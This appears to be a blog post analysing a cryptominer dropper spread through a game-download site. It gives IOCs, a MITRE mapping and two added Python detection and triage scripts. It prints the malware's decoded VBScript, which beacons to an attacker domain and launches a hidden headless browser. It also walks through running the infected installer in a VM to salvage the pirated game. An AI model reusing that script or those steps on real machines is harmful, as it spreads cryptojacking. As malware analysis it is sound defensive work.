The Target: IGI 2 - Covert Strike (2003)
I wanted to play an old game. I found it on a site called Ocean of Games.
The site looked normal. Screenshots. Instructions. Comments. It looked legitimate. It was not.
This is not a game site. It is a malware distribution network disguised as an archive.
Security analysts have confirmed:
- 18 indicators of compromise
- 11 MITRE ATT&CK techniques
- 5 threat categories
If you download from Ocean of Games, you are not downloading a game. You are downloading a cryptominer dropper wrapped in nostalgia.
The Infection
I downloaded IGI 2. I followed their instructions: "Step 1: Disable Windows Defender."
I played 4 missions. Then BSOD. Then days of recovery.
Then I had:
- Dead pen drive
- Crashed server
- Hardware failure
- Complete OS reinstall to get rid of the malware
- Countless errors and wasted time
The malware didn't just infect my computer. It derailed my life.
The Hunting Ground: Virtual Machine
I decided to fight back. Not with antivirus. With strategy.
I set up a virtual machine (VM), an isolated, disposable computer inside my real computer. A VM is a cage, but not a perfect one: hypervisor escapes exist, and shared folders, shared clipboard and drag-and-drop are doors you open yourself. Keep VirtualBox patched and keep those features off while the malware is running.
What you need:
- VirtualBox (free, open-source)
- A Windows ISO
- The infected game installer
What you do:
- Create a VM
- Install Windows (no product key needed)
- Disable Windows Defender inside the VM (let the malware win inside the cage)
- Download the game from Ocean of Games inside the VM
- Do not run the installer yet
The Password Was '123'
The downloaded file is a ZIP. Inside, you will find:
| File | What it is |
|---|---|
| Step 0 - AVENGERS_AIO_v2.5.0.rar | Malware dropper (ignore) |
| Step 1 - Disable Defender.rar | Disables Windows Defender (ignore) |
| Step 2 - Extract Setup.rar | Password-protected archive (the game + malware installer) |
| Password.txt | Contains the password: 123 |
Yes. The password is 123. They didn't even try.
The Execution
Extract Step 2 - Extract Setup.rar with password 123. You will get Step 3 - Setup_Install_Game.exe.
Run this installer inside the VM. It will install the game. It will also install the malware. That is fine. The VM is disposable.
After installation, locate the game folder (usually C:\IGI2_Game). Before anything leaves the VM, check that the folder holds only game files: none of the malware components listed below (WindowsService.exe, Windows Updates service.vbs, encode.vbs, MicrosoftRuntimeUpdate.vbe) and no .vbs, .vbe or other script files that a 2003 game would never ship. Only then attach a VirtualBox shared folder or a USB drive, copy the folder to your real system, and scan it on the host with Defender enabled before running it: Defender was off in the guest, so nothing has looked at these files yet.
Then delete the VM. The malware dies with it. Your real system never ran the installer; the only thing that crosses the boundary is the folder you inspected.
The Evidence (Full Technical Breakdown)
Malware Components
| File | Purpose |
|---|---|
| WindowsService.exe | Main payload launcher |
| Windows Updates service.vbs | VBScript that runs the miner |
| encode.vbs | Converts VBS to VBE (Microsoft Script Encoder output: reversible obfuscation, not encryption, but enough to beat naive string matching) |
Decoded VBScript (from the malware)

```vbscript
' Decoded VBScript recovered from the malware. Comments added for this write-up;
' the code itself is unchanged.
On Error Resume Next

' Pause(N) sleeps N*3000 ms, i.e. 3*N seconds, so Pause(21) below is 63 seconds.
Sub Pause(NSeconds)
    Wscript.Sleep(NSeconds*3000)
End Sub

Dim visualcpp
Set visualcpp = CreateObject("WScript.Shell")

' Connectivity gate: loop until a single ping to the attacker's host gets a reply.
' The "www.google.com." prefix is a decoy label; the registered domain is
' windows-display-service.com.
counter = True
While counter = True
    website = "www.google.com.739471594492594.windows-display-service.com"
    checkstring = "ping -n 1 -w 300 " & website
    ' Run(cmd, 0, True): hidden window, wait for exit, return the exit code.
    status = visualcpp.Run(checkstring, 0 , True)
    If status = 0 Then
        counter = False
    Else
        Pause(21)
    End If
Wend

' Payload stage: a hidden headless Chrome with remote debugging enabled loads the
' attacker's page. Run(..., 0, false) returns immediately, so the browser keeps
' running after the script moves on.
returncodestatus = "1"
returncodestatus = visualcpp.run("chrome --headless --disable-gpu --remote-debugging-port=9222 http://www.google.com.739471594492594.windows-display-service.com",0,false)
```
MITRE ATT&CK Techniques
| Tactic | Technique |
|---|---|
| Execution | User Execution: Malicious File (T1204.002), the victim runs Step 3 - Setup_Install_Game.exe |
| Persistence | Scheduled Task/Job (T1053) |
| Defense Evasion | Impair Defenses: Disable or Modify Tools (T1562.001), the "Step 1 - Disable Defender" archive |
| Discovery | Process Discovery (T1057) |
| Impact | Resource Hijacking (T1496), cryptomining through the headless browser |
Indicators of Compromise (IOCs)
- Domain: www.google.com.739471594492594.windows-display-service.com
- Files: MicrosoftRuntimeUpdate.vbe, Windows Updates service.vbs
- Processes: chrome.exe (headless), firefox.exe (headless)
- Password: 123
- Archive: Step 2 - Extract Setup.rar
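Turning these IOCs into something a SOC can run, as an added example that is not part of the original post: a small Python matcher over process-creation telemetry. The log lines are constructed for this example in a simplified Sysmon Event ID 1 shape (ParentImage, Image, CommandLine as key=value pairs); nothing here parses real Sysmon XML or EVTX. The domain, the headless-browser processes and the script file names come from the IOC list above. Treating wscript.exe/cscript.exe as the expected parent of the browser is this example's assumption, derived from the decoded script's use of WScript.Shell.Run, and the C:\ProgramData path in the last sample line is invented.

```python
"""Match the post's IOCs against process-creation events.

Added example, not code from the original post. SAMPLE_LOG is constructed
in a simplified Sysmon Event ID 1 shape; field names follow Sysmon, the
format does not.
"""
import re

IOC_DOMAIN_SUFFIX = "windows-display-service.com"       # from the post's IOC list
IOC_SCRIPT_NAMES = ("windows updates service.vbs",      # from the post's IOC list
                    "microsoftruntimeupdate.vbe", "encode.vbs")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")           # assumption: parent of the payload
BROWSERS = ("chrome.exe", "firefox.exe")                # from the post's IOC list


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(event):
    """Return the names of every rule that matches one process-creation event."""
    parent = basename(event["ParentImage"])
    image = basename(event["Image"])
    cmd_l = event["CommandLine"].lower()
    hits = []
    if IOC_DOMAIN_SUFFIX in cmd_l:
        hits.append("ioc_domain_in_commandline")
    if image in BROWSERS and "--headless" in cmd_l:
        if parent in SCRIPT_HOSTS:
            hits.append("headless_browser_from_script_host")
        if "--remote-debugging-port=" in cmd_l:
            hits.append("headless_browser_remote_debugging")
    # The exact ping flags from the decoded script. Weak on its own (admins ping
    # too), so it is meant to be read together with the domain rule.
    if image == "ping.exe" and re.search(r"-n\s+1\s+-w\s+300\b", cmd_l):
        hits.append("ping_beacon_pattern")
    if image in SCRIPT_HOSTS and any(n in cmd_l for n in IOC_SCRIPT_NAMES):
        hits.append("ioc_script_executed")
    return hits


def parse_line(line):
    """Constructed format: 'Key=value | Key=value | ...'. Splits on the first '='
    per field, so '--remote-debugging-port=9222' inside a value survives."""
    event = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        event[key.strip()] = value.strip()
    return event


def scan(lines):
    """Return [(Image, [rule, ...])] for every line that triggers at least one rule."""
    results = []
    for line in lines:
        event = parse_line(line)
        hits = detect(event)
        if hits:
            results.append((event["Image"], hits))
    return results


# Constructed sample telemetry, not captured from a real host.
SAMPLE_LOG = [
    # the ping gate from the decoded script
    r"ParentImage=C:\Windows\System32\wscript.exe | Image=C:\Windows\System32\PING.EXE | CommandLine=ping -n 1 -w 300 www.google.com.739471594492594.windows-display-service.com",
    # the payload stage from the decoded script
    r"ParentImage=C:\Windows\System32\wscript.exe | Image=C:\Program Files\Google\Chrome\Application\chrome.exe | CommandLine=chrome --headless --disable-gpu --remote-debugging-port=9222 http://www.google.com.739471594492594.windows-display-service.com",
    # a user opening Chrome normally: must stay quiet
    r'ParentImage=C:\Windows\explorer.exe | Image=C:\Program Files\Google\Chrome\Application\chrome.exe | CommandLine="C:\Program Files\Google\Chrome\Application\chrome.exe"',
    # an admin pinging a resolver from cmd: must stay quiet
    r"ParentImage=C:\Windows\System32\cmd.exe | Image=C:\Windows\System32\PING.EXE | CommandLine=ping 8.8.8.8",
    # the encoded script being launched (the ProgramData path is invented)
    r'ParentImage=C:\Windows\System32\svchost.exe | Image=C:\Windows\System32\wscript.exe | CommandLine=wscript.exe "C:\ProgramData\MicrosoftRuntimeUpdate.vbe"',
]

if __name__ == "__main__":
    for image, hits in scan(SAMPLE_LOG):
        print(f"{image}: {', '.join(hits)}")
```

Three of the five constructed lines fire; the two ordinary ones do not. The strongest single signal is a headless browser whose parent is a script host, which is how this script launches its payload; the ping flags alone would be noisy in any fleet.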
How to Extract Safely (For Anyone Facing Similar Malware)
If you are not comfortable with malware analysis, do not attempt to extract manually. But if you have the skills and patience, here is the method:
- Set up a VM. Use VirtualBox. It is free. Keep it patched, and leave shared folders, shared clipboard and drag-and-drop off until the inspection step below: those are the ways a guest reaches the host.
- Install Windows in the VM. No product key is needed; an unactivated install is fine for a throwaway machine.
- Take a snapshot of the clean VM before you download anything. Rolling back is faster than rebuilding.
- Disable Windows Defender inside the VM. Yes, turn it off. The malware needs to succeed inside the cage.
- Download the file from the sketchy site inside the VM.
- Extract the ZIP. Use 7-Zip.
- Find Password.txt. The password is often 123.
- Extract the password-protected archive.
- Run the installer inside the VM. Let the malware execute. The VM is disposable. Disconnecting the VM's network adapter first is a cheap extra, if the installer still completes offline: the decoded script above loops on a ping until its domain answers, so without a network that stage never fires.
- After installation, inspect the game folder before anything leaves the VM. None of the files from the Malware Components table (WindowsService.exe, Windows Updates service.vbs, encode.vbs) or MicrosoftRuntimeUpdate.vbe should be in it, and a 2003 game has no reason to ship .vbs, .vbe, .lnk or similar script files. Only then attach a shared folder or a USB drive, copy the folder out, and scan it on the host with Defender on before you run it. Do not let that USB drive touch any other machine before the host has scanned it.
- Delete the VM, or roll back to the clean snapshot. The malware dies.
Do not run the installer on your real system. Do not disable Windows Defender on your real system. Do not trust any file from Ocean of Games.
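One way to do the inspection step from the Execution section and from the list above, as an added example that is not part of the original post: a Python script, run inside the VM against the game folder, that records a SHA-256 for every file (a manifest you can publish with a report instead of "hashes available on request") and flags the file names the post lists as malware components, plus scriptable file types and document-style double extensions. The list of suspicious extensions is this example's assumption; the folder that demo() builds is constructed for the example, and C:\IGI2_Game is the folder name from the post.

```python
"""Triage an extracted game folder before it leaves the VM.

Added example for this write-up, not code from the original post. Walks a
directory, records a SHA-256 for every file, and flags:
  - file names the post lists as malware components,
  - scriptable file types a 2003 game has no reason to ship (assumed list),
  - executables hiding behind a document-style double extension.
The sample folder built by demo() is constructed for this example.
"""
import hashlib
import sys
import tempfile
from pathlib import Path

# Names from the post's "Malware Components" table and file IOCs, lower-cased.
KNOWN_BAD_NAMES = {
    "windowsservice.exe",
    "windows updates service.vbs",
    "encode.vbs",
    "microsoftruntimeupdate.vbe",
}

# Assumption: none of these belong in a game folder from 2003.
SUSPICIOUS_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh",
                         ".ps1", ".bat", ".cmd", ".lnk", ".scr", ".hta"}

# Extensions an attacker hides an .exe behind, e.g. "readme.txt.exe".
DOCUMENT_EXTENSIONS = {".txt", ".jpg", ".png", ".pdf", ".doc", ".mp3"}


def sha256_of(path):
    """Hash a file in 1 MiB chunks so large game assets are not read into memory at once."""
    digest = hashlib.sha256()
    with Path(path).open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def classify(path):
    """Return why a file is suspicious, or None if it looks like ordinary game data."""
    path = Path(path)
    name = path.name.lower()
    ext = path.suffix.lower()
    if name in KNOWN_BAD_NAMES:
        return "name matches a malware component listed in the post"
    if ext in SUSPICIOUS_EXTENSIONS:
        return f"scriptable file type {ext}"
    # "patch_notes.txt.exe" reads as a text file when Explorer hides known extensions.
    if ext == ".exe" and Path(name).with_suffix("").suffix in DOCUMENT_EXTENSIONS:
        return "executable masquerading as a document (double extension)"
    return None


def triage_folder(root):
    """Walk root; return ({relative_path: sha256}, [(relative_path, reason), ...])."""
    root = Path(root)
    manifest, findings = {}, []
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        manifest[rel] = sha256_of(path)
        reason = classify(path)
        if reason:
            findings.append((rel, reason))
    return manifest, findings


def build_constructed_sample(root):
    """Lay down a fake game folder: plausible assets plus three planted files."""
    (root / "data").mkdir()
    (root / "IGI2.exe").write_bytes(b"MZ" + b"\x00" * 64)
    (root / "data" / "weapons.dat").write_bytes(b"\x01\x02\x03")
    (root / "readme.txt").write_text("IGI 2 readme\n")
    # Planted: two names straight from the post's IOC list, one double extension.
    (root / "Windows Updates service.vbs").write_text("' planted for the example\n")
    (root / "MicrosoftRuntimeUpdate.vbe").write_text("#@~^ planted for the example\n")
    (root / "patch_notes.txt.exe").write_bytes(b"MZ")


def demo():
    """Build the constructed folder in a temp dir and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        build_constructed_sample(root)
        return triage_folder(root)


def report(manifest, findings):
    """Render a hash manifest followed by a copy/do-not-copy verdict."""
    lines = [f"{digest}  {rel}" for rel, digest in manifest.items()]
    lines.append("")
    if findings:
        lines.append("DO NOT COPY: suspicious files found")
        lines.extend(f"  {rel}: {reason}" for rel, reason in findings)
    else:
        lines.append("No suspicious files; folder is a candidate to copy out.")
    return "\n".join(lines)


if __name__ == "__main__":
    # Inside the VM: python triage.py C:\IGI2_Game   (no argument runs the constructed demo)
    result = triage_folder(sys.argv[1]) if len(sys.argv) > 1 else demo()
    print(report(*result))
```

On the constructed folder the two planted IOC names and the double-extension file are flagged and IGI2.exe, readme.txt and data/weapons.dat pass. A clean verdict from this script means the names and types look right, not that the files are safe; it is the gate before the host-side scan, not a replacement for it.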
The Aftermath
The malware is dead. The game is extracted. My real system is clean. Now I play the game on my real system.
What You Should Do
For Individuals
- Never disable Windows Defender. Not for a game crack. Not for anything.
- Use a VM for sketchy downloads.
- Keep backups. Encrypted backups. Offline backups.
- Switch to Linux. It is free, and your keyboard will work.
- Trust no one. Not a sketchy website. Not me. Verify everything.
For Law Enforcement & Cybersecurity Professionals
The evidence is public:
- Domains: oceanofgames.com, www.google.com.739471594492594.windows-display-service.com
- Password: 123
- File hashes: available upon request
This is not a sophisticated operation. It is a volume-based malware farm. But it has infected thousands of computers. It is still online. It is still distributing malware.
I have filed reports with Porkbun (domain registrar) and Cloudflare. I have reported to Google Safe Browsing and Microsoft SmartScreen.
You are holding the evidence. File the reports. Take down the site. Protect the next person who searches for IGI 2.
Visit my website and download legitimate software made by me at https://origin-inc-pvt-ltd.github.io/originempire.github.io/